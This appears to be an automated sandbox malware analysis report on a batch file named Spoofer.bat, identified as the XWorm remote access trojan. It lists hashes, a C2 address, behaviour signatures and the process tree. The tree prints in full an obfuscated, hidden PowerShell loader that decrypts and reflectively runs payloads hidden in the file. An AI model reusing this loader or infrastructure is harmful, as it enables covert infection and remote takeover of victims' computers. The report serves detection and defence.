Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 15:00

General

  • Target

    Spoofer.bat

  • Size

    293KB

  • MD5

    eafc5ba9f6f74bfced619180451718d1

  • SHA1

    1bf80060b1af65d0ae1c4e10ba681acdb97127da

  • SHA256

    1ecacd9c2ab0bc3acfde09e2819c2390e231110f5923fdd9ee26dfe76ccd337f

  • SHA512

    391e30a38a44bdde182a982067a68442e41f4d43cfee136fd7560c56cc0a537da03dcb6241675c69f3d57bd09d5f385d2674f9f708f450d88cc1314009e6d591

  • SSDEEP

    3072:3W+656Qjki8jgdcsZ9nd7Ab62C2TMT/CuL9j0XqwQ/HJ7kntdCoq+Saafyl9w5:3W+IWgdc0ZAu2m/7LdZwYHJmDFSJCi5

Malware Config

Extracted

Family

xworm

C2

kind-sofa.gl.at.ply.gg:31503

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Spoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2416
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3360
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:2192
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('alu9gNFHG/1+ONNuVv38kB6PYCH5Zwt0aaqQhOABIPQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TJb0r0olCEvhnI4DkaxyfQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mcfDl=New-Object System.IO.MemoryStream(,$param_var); $qjFRZ=New-Object System.IO.MemoryStream; $CoVvH=New-Object System.IO.Compression.GZipStream($mcfDl, [IO.Compression.CompressionMode]::Decompress); $CoVvH.CopyTo($qjFRZ); $CoVvH.Dispose(); $mcfDl.Dispose(); $qjFRZ.Dispose(); $qjFRZ.ToArray();}function execute_function($param_var,$param2_var){ $TXVMP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uDvWJ=$TXVMP.EntryPoint; $uDvWJ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Spoofer.bat';$VhdxI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Spoofer.bat').Split([Environment]::NewLine);foreach ($RSEQe in $VhdxI) { if ($RSEQe.StartsWith(':: ')) { $PYavD=$RSEQe.Substring(3); break; }}$payloads_var=[string[]]$PYavD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3592

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0urudonp.4jg.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/3592-0-0x00007FFF66363000-0x00007FFF66365000-memory.dmp

      Filesize

      8KB

    • memory/3592-4-0x0000025827F30000-0x0000025827F52000-memory.dmp

      Filesize

      136KB

    • memory/3592-11-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3592-12-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

      Filesize

      10.8MB

    • memory/3592-13-0x0000025828A50000-0x0000025828A58000-memory.dmp

      Filesize

      32KB

    • memory/3592-14-0x0000025828A60000-0x0000025828A98000-memory.dmp

      Filesize

      224KB

    • memory/3592-15-0x0000025828AC0000-0x0000025828AD8000-memory.dmp

      Filesize

      96KB

    • memory/3592-20-0x00007FFF66363000-0x00007FFF66365000-memory.dmp

      Filesize

      8KB

    • memory/3592-21-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp

      Filesize

      10.8MB